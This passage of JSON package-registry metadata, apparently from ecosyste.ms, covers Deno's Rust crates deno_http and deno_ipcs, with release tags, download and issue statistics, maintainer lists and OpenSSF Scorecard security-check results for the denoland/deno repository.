ags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-26T05:51:46.604Z","dependent_packages_count":9,"downloads":654175,"downloads_period":"total","dependent_repos_count":30,"rankings":{"downloads":5.123392162728089,"dependent_repos_count":5.161531558480407,"dependent_packages_count":4.22818591153196,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.557792219476752},"purl":"pkg:cargo/deno_http","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_http","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_http","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_http/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:48:12.804Z","issues_count":6610,"pull_requests_count":9623,"avg_time_to_close_issue":17236144.535497494,"avg_time_to_close_pull_request":1534358.7653889374,"issues_closed_count":3787,"pull_requests_closed_count":8008,"pull_request_authors_count":577,"issue_authors_count":2467,"avg_comments_per_issue":2.509531013615734,"avg_comments_per_pull_request":0.7160968512937753,"merged_pull_requests_count":6992,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":664,"past_year_pull_requests_count":1191,"past_year_avg_time_to_close_issue":1367826.3136363637,"past_year_avg_time_to_close_pull_request":1331942.9891472869,"past_year_issues_closed_count":220,"past_year_pull_requests_closed_count":645,"past_year_pull_request_authors_count":182,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.216867469879518,"past_year_avg_comments_per_pull_request":1.0839630562552478,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":474,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1789,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":386,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:27.477Z","updated_at":"2022-11-07T18:29:27.477Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:28.213Z","updated_at":"2023-07-18T22:41:28.213Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":10862022,"name":"deno_ipcs","ecosystem":"cargo","description":"ipcs implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2024-09-06T06:33:11.125Z","latest_release_published_at":"2024-09-11T04:32:39.398Z","latest_release_number":"0.2.0","last_synced_at":"2026-08-29T21:57:45.648Z","created_at":"2024-09-06T06:47:28.737Z","updated_at":"2026-08-29T21:57:45.648Z","registry_url":"https://crates.io/crates/deno_ipcs/","install_command":"cargo install deno_ipcs","documentation_url":"https://docs.rs/deno_ipcs/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: 